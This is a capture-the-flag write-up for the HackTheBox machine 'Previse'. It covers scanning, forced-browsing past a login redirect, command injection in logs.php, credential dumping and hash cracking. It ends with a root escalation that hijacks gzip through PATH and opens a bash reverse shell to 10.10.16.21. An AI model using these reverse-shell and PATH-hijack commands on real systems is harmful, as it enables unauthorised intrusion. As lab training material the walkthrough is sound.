htb Playground - privise Target Machine

Preface#

privise target machine, randomly selected from an htb arena, let's see if we can do it.

Arena link: 10.10.11.104

Information Gathering#

Directly access http://10.10.11.104/login.php, a login box.

Pasted image 20220108200022

Try weak passwords, universal password.

Port scanning

nmap -T4 -sC -sV -p- 10.10.11.104

fscan scanning, found two ports, 22 and 80.

![[Pasted image 20220108200845.png]]

Fingerprint recognition

Pasted image 20220108200310

Vulnerability Exploitation#

nuclei scanning found an openssh user enumeration vulnerability.

Pasted image 20220108201535

Using this vulnerability, ssh-related accounts were discovered:

4Dgifts
EZsetup
OpenSSH
OutOfBox
ROOT
adm
admin
administrator
anon
auditor
avahi
avahi-autoipd
backup
bbs
bin
checkfs
checkfsys
checksys
cmwlogin
couchdb
daemon
dbadmin
demo
demos
diag
distccd
dni
fal
fax
ftp
games
gdm
gnats
guest
haldaemon
halt
install
irc
kernoops
libuuid
list
listen
lpadm
lpadmin
lynx
mail
man
me
mountfs
mountfsys
mountsys
news
noaccess
nobody
nobody4
nxpgsql
operator
oracle
popr
postmaster
rfindd
saned
sshd
symop
sync
sysadm
sysadmin
syslog
system_admin
udadmin
ultra
us_admin
user
uucp
uucpadm
web
webmaster
www-data
xpopr
zabbix

Directory scanning

Use gobuster for directory scanning, other tools like ffuf and dirsearch didn't find anything.

gobuster dir -w /p12-字典收集/web漏洞/目录fuzz/directory-list-2.3-medium.txt -u http://10.10.11.104/ -x php,html,txt

The approximate results are as follows:

Pasted image 20220108204922

Look at some of the ones with a status of 200, you can see that there is a nav.php, let's visit and see, the interface is as follows:

Pasted image 20220108205032

Directly accessing these pages will redirect to login.php, but if you use burp to access, you can see the related pages.

Pasted image 20220108210244

To register an account, you need to first copy the post request package, then create a new html document, fill in the complete request link in the action, and register the user.

<form role="form" method="post" action="http://10.10.11.104/accounts.php">
    <div class="uk-margin">
        <div class="uk-inline">
            <span class="uk-form-icon" uk-icon="icon: user"></span>
            <input type="text" name="username" class="uk-input" id="username" placeholder="Username">
        </div>
    </div>
    <div class="uk-margin">
        <div class="uk-inline">
            <span class="uk-form-icon" uk-icon="icon: lock"></span>
            <input type="password" name="password" class="uk-input" id="password" placeholder="Password">
        </div>
    </div>
    <div class="uk-margin">
        <div class="uk-inline">
            <span class="uk-form-icon" uk-icon="icon: lock"></span>
            <input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
        </div>
    </div>
    <button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
</form>

Use the registered user to log in, the registered account is admin1/admin123.

Pasted image 20220108211333

Visit the http://10.10.11.104/files.php page, there is a compressed file to download and it turns out to be a source code file.

Pasted image 20220108211843

The source code is as follows:

Pasted image 20220108211910

Analyze the source code, at the logs.php, there is a command execution vulnerability.

Pasted image 20220108214004

Capture http://10.10.11.104/file_logs.php, the payload is as follows, nc listens, and get the shell.

Pasted image 20220108214553

Local IP.

Pasted image 20220108214642

Elevate to an interactive terminal.

python3 -c "import pty;pty.spawn('/bin/bash')"

Pasted image 20220108214931

In the previously backed up source code file, a database password was found.

Pasted image 20220108220022

See if you can connect to the database.

mysql -uroot -p

Pasted image 20220108220148

show databases;
use previse;
select * from accounts;

Pasted image 20220108220257

This password is an md5 password, use john to crack it.

Got the password ilovecody112235!.

ssh login with m4lwhere account, find the first flag.

Privilege Escalation#

Next, we need to escalate to the root user.

Use sudo -l to view the files running as root.

Pasted image 20220108222511

The access_backup.sh script has write and execute permissions.

Pasted image 20220108222552

The file content is:

    
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

This file calls the gzip command to back up logs, through this we can escalate privileges, because this script is running as root, so we just need to replace the gzip command.


cd /tmp
#vim gzip and write the following content
#/bin/bash
bash -i >& /dev/tcp/10.10.16.21/1234 0>&1

#Give permissions
chmod 777 gzip
export PATH=$(pwd):$PATH

#Then execute the script access_backup.sh
sudo /opt/scripts/access_backup.sh

Successfully bounced back to shell and obtained the flag.

Pasted image 20220108225817